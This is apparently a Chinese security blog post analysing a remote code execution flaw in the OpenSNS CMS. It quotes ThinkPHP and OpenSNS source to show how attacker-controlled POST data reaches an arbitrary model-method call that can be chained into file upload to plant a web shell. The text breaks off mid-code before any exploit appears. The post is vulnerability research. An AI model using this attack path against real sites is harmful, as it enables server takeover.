<!DOCTYPE html>
<html lang=zh-CN>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta property="og:description" content="">
    <meta property="og:type" content="website">
    <meta name="description" content="">
    <meta name="keyword"  content="">
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        OPENSNS最新版前台getshell - Seaii&#39;s Blog
        
    </title>

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/aircloud.css">

    
<link rel="stylesheet" href="/css/gitment.css">

    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_28hi1hpxx24.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>
<meta name="generator" content="Hexo 6.2.0"></head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i>  </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar ">
            <img src="/img/avatar.jpeg" />
        </div>
        <div class="name">
            <i>seaii</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li >
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>主页</span>
                </a>
            </li>
            <li >
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>标签</span>
                </a>
            </li>
            <li >
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>存档</span>
                </a>
            </li>
            <li >
                <a href="/collect/">
                    <i class="iconfont icon-shoucang1"></i>
                    <span>收藏</span>
                </a>
            </li>
            <li >
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>关于</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01%E5%89%8D%E8%A8%80"><span class="toc-text">0x01前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-text">0x02漏洞分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x03%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-text">0x03漏洞利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x04%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="toc-text">0x04漏洞修复</span></a></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-bg" id="search-bg"></div>
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input"/>
            <span id="begin-search">搜索</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>

        <div class="index-about-mobile">
            <i>  </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        OPENSNS最新版前台getshell
    </div>

    <div class="post-meta">
        <span class="attr">发布于：<span>2017-05-24 22:15:00</span></span>
        
        <span class="attr">标签：/
        
        <a class="tag" href="/tags/#opensns" title="opensns">opensns</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">访问：<span id="busuanzi_value_page_pv"></span>
</span>
</span>
    </div>
    <div class="post-content ">
        <h3 id="0x01前言"><a href="#0x01前言" class="headerlink" title="0x01前言"></a>0x01前言</h3><p>前些天表哥们去打awd，碰到这个opensns，百度了几个漏洞都没利用成功，最后终于在Google上找到了这个利用方法（<a target="_blank" href="http://0day5.com/archives/4280/">http://0day5.com/archives/4280/</a>），然而比赛也快结束了。。。。这套cms基于ThinkPHP框架开发，感觉有必要跟一跟这个漏洞。话不多说，开始！</p>
<span id="more"></span>

<h3 id="0x02漏洞分析"><a href="#0x02漏洞分析" class="headerlink" title="0x02漏洞分析"></a>0x02漏洞分析</h3><p>问题出在<code>/Application/Weibo/Controller/ShareController.class.php</code>中的doSendShare函数中：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">doSendShare</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$aContent</span> = <span class="title function_ invoke__">I</span>(<span class="string">&#x27;post.content&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;text&#x27;</span>);</span><br><span class="line">    <span class="variable">$aQuery</span> = <span class="title function_ invoke__">I</span>(<span class="string">&#x27;post.query&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="string">&#x27;text&#x27;</span>);</span><br><span class="line">    <span class="title function_ invoke__">parse_str</span>(<span class="variable">$aQuery</span>,<span class="variable">$feed_data</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">empty</span>(<span class="variable">$aContent</span>))&#123;</span><br><span class="line">         <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">error</span>(<span class="title function_ invoke__">L</span>(<span class="string">&#x27;_ERROR_CONTENT_CANNOT_EMPTY_&#x27;</span>));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">is_login</span>())&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">error</span>(<span class="title function_ invoke__">L</span>(<span class="string">&#x27;_ERROR_SHARE_PLEASE_FIRST_LOGIN_&#x27;</span>));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$new_id</span> = <span class="title function_ invoke__">send_weibo</span>(<span class="variable">$aContent</span>, <span class="string">&#x27;share&#x27;</span>,         <span class="variable">$feed_data</span>,<span class="variable">$feed_data</span>[<span class="string">&#x27;from&#x27;</span>]);</span><br><span class="line"></span><br><span class="line">    <span class="variable">$info</span> =  <span class="title function_ invoke__">D</span>(<span class="string">&#x27;Weibo/Share&#x27;</span>)-&gt;<span class="title function_ invoke__">getInfo</span>(<span class="variable">$feed_data</span>);</span><br><span class="line">......</span><br></pre></td></tr></table></figure>
<p>可以看到$aQuery和$aContent都是通过post传递过来的，然后下面对$aQuery进行操作，结果保存在$feed_data中。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">parse_str</span>(<span class="variable">$aQuery</span>,<span class="variable">$feed_data</span>);</span><br></pre></td></tr></table></figure>
<p>跟踪$feed_data变量，可以看到它进入了getInfo函数。<br>位置：<code>/Application/Weibo/Model/ShareModel.class.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">getInfo</span>(<span class="params"><span class="variable">$param</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        <span class="variable">$info</span> = <span class="keyword">array</span>();</span><br><span class="line">        <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$param</span>[<span class="string">&#x27;app&#x27;</span>]) &amp;&amp; !<span class="keyword">empty</span>(<span class="variable">$param</span>[<span class="string">&#x27;model&#x27;</span>]) &amp;&amp; !<span class="keyword">empty</span>(<span class="variable">$param</span>[<span class="string">&#x27;method&#x27;</span>]))&#123;</span><br><span class="line">            <span class="variable">$info</span> = <span class="title function_ invoke__">D</span>(<span class="variable">$param</span>[<span class="string">&#x27;app&#x27;</span>].<span class="string">&#x27;/&#x27;</span>.<span class="variable">$param</span>[<span class="string">&#x27;model&#x27;</span>])-&gt;<span class="variable">$param</span>[<span class="string">&#x27;method&#x27;</span>](<span class="variable">$param</span>[<span class="string">&#x27;id&#x27;</span>]);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$info</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里这个D函数是ThinkPH中的一个实例化类的函数，跟一下看看:<br>位置：<code>/ThinkPHP/Common/functions.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">D</span>(<span class="params"><span class="variable">$name</span> = <span class="string">&#x27;&#x27;</span>, <span class="variable">$layer</span> = <span class="string">&#x27;&#x27;</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">empty</span>(<span class="variable">$name</span>)) <span class="keyword">return</span> <span class="keyword">new</span> <span class="title class_">Think\Model</span>;</span><br><span class="line">    <span class="built_in">static</span> <span class="variable">$_model</span> = <span class="keyword">array</span>();</span><br><span class="line">    <span class="variable">$layer</span> = <span class="variable">$layer</span> ? : <span class="title function_ invoke__">C</span>(<span class="string">&#x27;DEFAULT_M_LAYER&#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_model</span>[<span class="variable">$name</span> . <span class="variable">$layer</span>]))</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$_model</span>[<span class="variable">$name</span> . <span class="variable">$layer</span>];</span><br><span class="line">    <span class="variable">$class</span> = <span class="title function_ invoke__">parse_res_name</span>(<span class="variable">$name</span>, <span class="variable">$layer</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">class_exists</span>(<span class="variable">$class</span>)) &#123;</span><br><span class="line">        <span class="variable">$model</span> = <span class="keyword">new</span> <span class="variable">$class</span>(<span class="title function_ invoke__">basename</span>(<span class="variable">$name</span>));</span><br><span class="line">    &#125; <span class="keyword">elseif</span> (<span class="literal">false</span> === <span class="title function_ invoke__">strpos</span>(<span class="variable">$name</span>, <span class="string">&#x27;/&#x27;</span>)) &#123;</span><br><span class="line">        <span class="comment">// 自动加载公共模块下面的模型</span></span><br><span class="line">        <span class="keyword">if</span> (!<span class="title function_ invoke__">C</span>(<span class="string">&#x27;APP_USE_NAMESPACE&#x27;</span>)) &#123;</span><br><span class="line">            <span class="title function_ invoke__">import</span>(<span class="string">&#x27;Common/&#x27;</span> . <span class="variable">$layer</span> . <span class="string">&#x27;/&#x27;</span> . <span class="variable">$class</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$class</span> = <span class="string">&#x27;\\Common\\&#x27;</span> . <span class="variable">$layer</span> . <span class="string">&#x27;\\&#x27;</span> . <span class="variable">$name</span> . <span class="variable">$layer</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$model</span> = <span class="title function_ invoke__">class_exists</span>(<span class="variable">$class</span>) ? <span class="keyword">new</span> <span class="variable">$class</span>(<span class="variable">$name</span>) : <span class="keyword">new</span> <span class="title class_">Think\Model</span>(<span class="variable">$name</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="title class_">\Think\Log</span>::<span class="title function_ invoke__">record</span>(<span class="string">&#x27;D方法实例化没找到模型类&#x27;</span> . <span class="variable">$class</span>, <span class="title class_">Think\Log</span>::<span class="variable constant_">NOTICE</span>);</span><br><span class="line">        <span class="variable">$model</span> = <span class="keyword">new</span> <span class="title class_">Think\Model</span>(<span class="title function_ invoke__">basename</span>(<span class="variable">$name</span>));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$_model</span>[<span class="variable">$name</span> . <span class="variable">$layer</span>] = <span class="variable">$model</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$model</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这个函数有两个参数，但是我们只能控制第一个参数的值，也就是形参$name的值。那么可以看到如果$layer为空的话，就取C(‘DEFAULT_M_LAYER’)的值，那么这个值是多少呢？<br>在<code>/ThinkPHP/Conf/convention.php</code>中有:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;DEFAULT_M_LAYER&#x27;       =&gt;  &#x27;Model&#x27;, // 默认的模型层名称</span><br></pre></td></tr></table></figure>
<p>那么就是取默认的值，也就是Model。<br>那么意思就是说，我们只能实例化一个类名格式如xxxxxModel这样的类。<br>然后调用该类的哪一个方法也是我们可控的，就连方法的第一个参数也是我们可控的。<br>再回过头来看getInfo函数这一行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$info</span> = <span class="title function_ invoke__">D</span>(<span class="variable">$param</span>[<span class="string">&#x27;app&#x27;</span>].<span class="string">&#x27;/&#x27;</span>.<span class="variable">$param</span>[<span class="string">&#x27;model&#x27;</span>])-&gt;<span class="variable">$param</span>[<span class="string">&#x27;method&#x27;</span>](<span class="variable">$param</span>[<span class="string">&#x27;id&#x27;</span>]);</span><br></pre></td></tr></table></figure>
<p>只传递了一个参数，$param[‘model’]是要调用的模块，$param[‘method’]是方法（只能是public），$param[‘id’]是所调用方法的第一个参数。<br>这个地方要怎么利用呢？在这里膜一下大牛的思路——找一个上传类，能上传文件，不就能getshell了嘛！</p>
<p>在<code>/Application/Home/Model/FileModel.class.php</code>这个文件中有一个文件上传函数，具体看一下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">upload</span>(<span class="params"><span class="variable">$files</span>, <span class="variable">$setting</span>, <span class="variable">$driver</span> = <span class="string">&#x27;Local&#x27;</span>, <span class="variable">$config</span> = <span class="literal">null</span></span>)</span>&#123;</span><br><span class="line">	<span class="comment">/* 上传文件 */</span></span><br><span class="line">	<span class="variable">$setting</span>[<span class="string">&#x27;callback&#x27;</span>] = <span class="keyword">array</span>(<span class="variable language_">$this</span>, <span class="string">&#x27;isFile&#x27;</span>);</span><br><span class="line">	<span class="variable">$Upload</span> = <span class="keyword">new</span> <span class="title class_">\Think\Upload</span>(<span class="variable">$setting</span>, <span class="variable">$driver</span>, <span class="variable">$config</span>);</span><br><span class="line">	<span class="variable">$info</span>   = <span class="variable">$Upload</span>-&gt;<span class="title function_ invoke__">upload</span>(<span class="variable">$files</span>);</span><br><span class="line"></span><br><span class="line">	<span class="comment">/* 设置文件保存位置 */</span></span><br><span class="line">	<span class="variable language_">$this</span>-&gt;_auto[] = <span class="keyword">array</span>(<span class="string">&#x27;location&#x27;</span>, <span class="string">&#x27;Ftp&#x27;</span> === <span class="variable">$driver</span> ? <span class="number">1</span> : <span class="number">0</span>, <span class="built_in">self</span>::<span class="variable constant_">MODEL_INSERT</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$info</span>)&#123; <span class="comment">//文件上传成功，记录文件信息</span></span><br><span class="line">		<span class="keyword">foreach</span> (<span class="variable">$info</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; &amp;<span class="variable">$value</span>) &#123;</span><br><span class="line">			<span class="comment">/* 已经存在文件记录 */</span></span><br><span class="line">			<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$value</span>[<span class="string">&#x27;id&#x27;</span>]) &amp;&amp; <span class="title function_ invoke__">is_numeric</span>(<span class="variable">$value</span>[<span class="string">&#x27;id&#x27;</span>]))&#123;</span><br><span class="line">				<span class="keyword">continue</span>;</span><br><span class="line">			&#125;</span><br><span class="line"></span><br><span class="line">			<span class="comment">/* 记录文件信息 */</span></span><br><span class="line">			<span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">create</span>(<span class="variable">$value</span>) &amp;&amp; (<span class="variable">$id</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">add</span>()))&#123;</span><br><span class="line">				<span class="variable">$value</span>[<span class="string">&#x27;id&#x27;</span>] = <span class="variable">$id</span>;</span><br><span class="line">			&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">				<span class="comment">//<span class="doctag">TODO:</span> 文件上传成功，但是记录文件信息失败，需记录日志</span></span><br><span class="line">				<span class="keyword">unset</span>(<span class="variable">$info</span>[<span class="variable">$key</span>]);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">return</span> <span class="variable">$info</span>; <span class="comment">//文件上传成功</span></span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="variable language_">$this</span>-&gt;error = <span class="variable">$Upload</span>-&gt;<span class="title function_ invoke__">getError</span>();</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里调用了ThinkPHP的upload函数，继续跟踪。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$info</span>   = <span class="variable">$Upload</span>-&gt;<span class="title function_ invoke__">upload</span>(<span class="variable">$files</span>);</span><br></pre></td></tr></table></figure>
<p>位置：<code>/ThinkPHP/Library/Think/Upload.class.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">upload</span>(<span class="params"><span class="variable">$files</span> = <span class="string">&#x27;&#x27;</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">/*省略部分代码*/</span></span><br><span class="line">        <span class="comment">// 对上传文件数组信息处理</span></span><br><span class="line">        <span class="variable">$files</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">dealFiles</span>(<span class="variable">$files</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$files</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$file</span>) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$file</span>[<span class="string">&#x27;key&#x27;</span>])) <span class="variable">$file</span>[<span class="string">&#x27;key&#x27;</span>] = <span class="variable">$key</span>;</span><br><span class="line">            <span class="comment">/* 通过扩展获取文件类型，可解决FLASH上传$FILES数组返回文件类型错误的问题 */</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$finfo</span>)) &#123;</span><br><span class="line">                <span class="variable">$file</span>[<span class="string">&#x27;type&#x27;</span>] = <span class="title function_ invoke__">finfo_file</span>(<span class="variable">$finfo</span>, <span class="variable">$file</span>[<span class="string">&#x27;tmp_name&#x27;</span>]);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* 获取上传文件后缀，允许上传无后缀文件 */</span></span><br><span class="line">            <span class="variable">$file</span>[<span class="string">&#x27;ext&#x27;</span>] = <span class="title function_ invoke__">pathinfo</span>(<span class="variable">$file</span>[<span class="string">&#x27;name&#x27;</span>], PATHINFO_EXTENSION);</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* 文件上传检测 */</span></span><br><span class="line">            <span class="keyword">if</span> (!<span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">check</span>(<span class="variable">$file</span>)) &#123;</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* 获取文件hash */</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;hash) &#123;</span><br><span class="line">                <span class="variable">$file</span>[<span class="string">&#x27;md5&#x27;</span>] = <span class="title function_ invoke__">md5_file</span>(<span class="variable">$file</span>[<span class="string">&#x27;tmp_name&#x27;</span>]);</span><br><span class="line">                <span class="variable">$file</span>[<span class="string">&#x27;sha1&#x27;</span>] = <span class="title function_ invoke__">sha1_file</span>(<span class="variable">$file</span>[<span class="string">&#x27;tmp_name&#x27;</span>]);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* 调用回调函数检测文件是否存在 */</span></span><br><span class="line">            <span class="variable">$data</span> = <span class="title function_ invoke__">call_user_func</span>(<span class="variable">$this</span>-&gt;callback, <span class="variable">$file</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;callback &amp;&amp; <span class="variable">$data</span>) &#123;</span><br><span class="line">                <span class="variable">$drconfig</span> = <span class="variable language_">$this</span>-&gt;driverConfig;</span><br><span class="line">                <span class="variable">$fname</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&#x27;http://&#x27;</span> . <span class="variable">$drconfig</span>[<span class="string">&#x27;domain&#x27;</span>] . <span class="string">&#x27;/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$data</span>[<span class="string">&#x27;url&#x27;</span>]);</span><br><span class="line"></span><br><span class="line">                <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(<span class="string">&#x27;.&#x27;</span> . <span class="variable">$data</span>[<span class="string">&#x27;path&#x27;</span>])) &#123;</span><br><span class="line">                    <span class="variable">$info</span>[<span class="variable">$key</span>] = <span class="variable">$data</span>;</span><br><span class="line">                    <span class="keyword">continue</span>;</span><br><span class="line">                &#125; <span class="keyword">elseif</span> (<span class="variable language_">$this</span>-&gt;uploader-&gt;<span class="title function_ invoke__">info</span>(<span class="variable">$fname</span>)) &#123;</span><br><span class="line">                    <span class="variable">$info</span>[<span class="variable">$key</span>] = <span class="variable">$data</span>;</span><br><span class="line">                    <span class="keyword">continue</span>;</span><br><span class="line">                &#125; <span class="keyword">elseif</span> (<span class="variable language_">$this</span>-&gt;removeTrash) &#123;</span><br><span class="line">                    <span class="title function_ invoke__">call_user_func</span>(<span class="variable">$this</span>-&gt;removeTrash, <span class="variable">$data</span>); <span class="comment">//删除垃圾据</span></span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* 生成保存文件名 */</span></span><br><span class="line">            <span class="variable">$savename</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getSaveName</span>(<span class="variable">$file</span>);</span><br><span class="line">            <span class="keyword">if</span> (<span class="literal">false</span> == <span class="variable">$savename</span>) &#123;</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$file</span>[<span class="string">&#x27;savename&#x27;</span>] = <span class="variable">$savename</span>;</span><br><span class="line">                <span class="comment">//$file[&#x27;name&#x27;] = $savename;</span></span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* 检测并创建子目录 */</span></span><br><span class="line">            <span class="variable">$subpath</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getSubPath</span>(<span class="variable">$file</span>[<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line">            <span class="keyword">if</span> (<span class="literal">false</span> === <span class="variable">$subpath</span>) &#123;</span><br><span class="line">                <span class="keyword">continue</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$file</span>[<span class="string">&#x27;savepath&#x27;</span>] = <span class="variable language_">$this</span>-&gt;savePath . <span class="variable">$subpath</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* 对图像文件进行严格检测 （不知道对这里严格检测的意义何在。。。）*/</span></span><br><span class="line">            <span class="variable">$ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file</span>[<span class="string">&#x27;ext&#x27;</span>]);</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$ext</span>, <span class="keyword">array</span>(<span class="string">&#x27;gif&#x27;</span>, <span class="string">&#x27;jpg&#x27;</span>, <span class="string">&#x27;jpeg&#x27;</span>, <span class="string">&#x27;bmp&#x27;</span>, <span class="string">&#x27;png&#x27;</span>, <span class="string">&#x27;swf&#x27;</span>))) &#123;</span><br><span class="line">                <span class="variable">$imginfo</span> = <span class="title function_ invoke__">getimagesize</span>(<span class="variable">$file</span>[<span class="string">&#x27;tmp_name&#x27;</span>]);</span><br><span class="line">                <span class="keyword">if</span> (<span class="keyword">empty</span>(<span class="variable">$imginfo</span>) || (<span class="variable">$ext</span> == <span class="string">&#x27;gif&#x27;</span> &amp;&amp; <span class="keyword">empty</span>(<span class="variable">$imginfo</span>[<span class="string">&#x27;bits&#x27;</span>]))) &#123;</span><br><span class="line">                    <span class="variable language_">$this</span>-&gt;error = <span class="string">&#x27;非法图像文件！&#x27;</span>;</span><br><span class="line">                    <span class="keyword">continue</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$file</span>[<span class="string">&#x27;rootPath&#x27;</span>] = <span class="variable language_">$this</span>-&gt;config[<span class="string">&#x27;rootPath&#x27;</span>];</span><br><span class="line">            <span class="variable">$name</span> = <span class="title function_ invoke__">get_addon_class</span>(<span class="variable">$this</span>-&gt;driver);</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">class_exists</span>(<span class="variable">$name</span>)) &#123;</span><br><span class="line">                <span class="variable">$class</span> = <span class="keyword">new</span> <span class="variable">$name</span>();</span><br><span class="line">                <span class="keyword">if</span> (<span class="title function_ invoke__">method_exists</span>(<span class="variable">$class</span>, <span class="string">&#x27;uploadDealFile&#x27;</span>)) &#123;</span><br><span class="line">                    <span class="variable">$class</span>-&gt;<span class="title function_ invoke__">uploadDealFile</span>(<span class="variable">$file</span>);</span><br><span class="line">                